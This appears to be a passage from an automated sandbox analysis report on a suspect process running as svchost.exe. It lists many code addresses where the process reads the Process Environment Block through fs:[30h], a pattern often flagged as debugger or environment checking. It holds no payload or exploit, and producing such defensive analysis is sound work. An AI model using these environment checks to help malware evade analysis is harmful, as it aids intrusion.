Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]	2_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]	2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]	2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]	2_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]	2_2_03238550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]	2_2_03238550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]	2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]	2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]	2_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]	2_2_032545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]	2_2_032545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232582 mov eax, dword ptr fs:[00000030h]	2_2_03232582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232582 mov ecx, dword ptr fs:[00000030h]	2_2_03232582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264588 mov eax, dword ptr fs:[00000030h]	2_2_03264588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E59C mov eax, dword ptr fs:[00000030h]	2_2_0326E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032325E0 mov eax, dword ptr fs:[00000030h]	2_2_032325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]	2_2_0326C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]	2_2_0326C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]	2_2_0326E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]	2_2_0326E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032365D0 mov eax, dword ptr fs:[00000030h]	2_2_032365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0326A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0326A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]	2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]	2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]	2_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C427 mov eax, dword ptr fs:[00000030h]	2_2_0322C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]	2_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A430 mov eax, dword ptr fs:[00000030h]	2_2_0326A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]	2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]	2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]	2_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC460 mov ecx, dword ptr fs:[00000030h]	2_2_032BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]	2_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]	2_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]	2_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]	2_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA456 mov eax, dword ptr fs:[00000030h]	2_2_032EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322645D mov eax, dword ptr fs:[00000030h]	2_2_0322645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325245A mov eax, dword ptr fs:[00000030h]	2_2_0325245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032364AB mov eax, dword ptr fs:[00000030h]	2_2_032364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032644B0 mov ecx, dword ptr fs:[00000030h]	2_2_032644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_032BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA49A mov eax, dword ptr fs:[00000030h]	2_2_032EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032304E5 mov ecx, dword ptr fs:[00000030h]	2_2_032304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]	2_2_0325EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]	2_2_0325EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]	2_2_032F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]	2_2_032F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]	2_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322CB7E mov eax, dword ptr fs:[00000030h]	2_2_0322CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]	2_2_032E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]	2_2_032E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]	2_2_032C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]	2_2_032C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FAB40 mov eax, dword ptr fs:[00000030h]	2_2_032FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D8B42 mov eax, dword ptr fs:[00000030h]	2_2_032D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DEB50 mov eax, dword ptr fs:[00000030h]	2_2_032DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]	2_2_03240BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]	2_2_03240BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_032E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_032E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]	2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]	2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]	2_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EBFC mov eax, dword ptr fs:[00000030h]	2_2_0325EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_032BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]	2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]	2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]	2_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]	2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]	2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]	2_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_032DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA24 mov eax, dword ptr fs:[00000030h]	2_2_0326CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EA2E mov eax, dword ptr fs:[00000030h]	2_2_0325EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]	2_2_03254A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]	2_2_03254A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA38 mov eax, dword ptr fs:[00000030h]	2_2_0326CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BCA11 mov eax, dword ptr fs:[00000030h]	2_2_032BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]	2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]	2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]	2_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DEA60 mov eax, dword ptr fs:[00000030h]	2_2_032DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]	2_2_032ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]	2_2_032ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]	2_2_03236A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]	2_2_03240A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]	2_2_03240A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]	2_2_03238AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]	2_2_03238AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286AA4 mov eax, dword ptr fs:[00000030h]	2_2_03286AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03304A80 mov eax, dword ptr fs:[00000030h]	2_2_03304A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03268A90 mov edx, dword ptr fs:[00000030h]	2_2_03268A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]	2_2_0326AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]	2_2_0326AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]	2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]	2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]	2_2_03286ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230AD0 mov eax, dword ptr fs:[00000030h]	2_2_03230AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]	2_2_03264AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]	2_2_03264AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B892A mov eax, dword ptr fs:[00000030h]	2_2_032B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C892B mov eax, dword ptr fs:[00000030h]	2_2_032C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]	2_2_032AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]	2_2_032AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC912 mov eax, dword ptr fs:[00000030h]	2_2_032BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]	2_2_03228918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]	2_2_03228918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]	2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327096E mov edx, dword ptr fs:[00000030h]	2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]	2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]	2_2_032D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]	2_2_032D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC97C mov eax, dword ptr fs:[00000030h]	2_2_032BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0946 mov eax, dword ptr fs:[00000030h]	2_2_032B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]	2_2_032309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]	2_2_032309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B89B3 mov esi, dword ptr fs:[00000030h]	2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]	2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]	2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_032BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]	2_2_032629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]	2_2_032629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C69C0 mov eax, dword ptr fs:[00000030h]	2_2_032C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032649D0 mov eax, dword ptr fs:[00000030h]	2_2_032649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_032FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov ecx, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A830 mov eax, dword ptr fs:[00000030h]	2_2_0326A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]	2_2_032D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]	2_2_032D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC810 mov eax, dword ptr fs:[00000030h]	2_2_032BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]	2_2_032BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]	2_2_032BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h]	2_2_032C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h]	2_2_032C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03242840 mov ecx, dword ptr fs:[00000030h]	2_2_03242840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260854 mov eax, dword ptr fs:[00000030h]	2_2_03260854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234859 mov eax, dword ptr fs:[00000030h]	2_2_03234859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234859 mov eax, dword ptr fs:[00000030h]	2_2_03234859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230887 mov eax, dword ptr fs:[00000030h]	2_2_03230887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC89D mov eax, dword ptr fs:[00000030h]	2_2_032BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_032FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0326C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0326C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0325E8C0
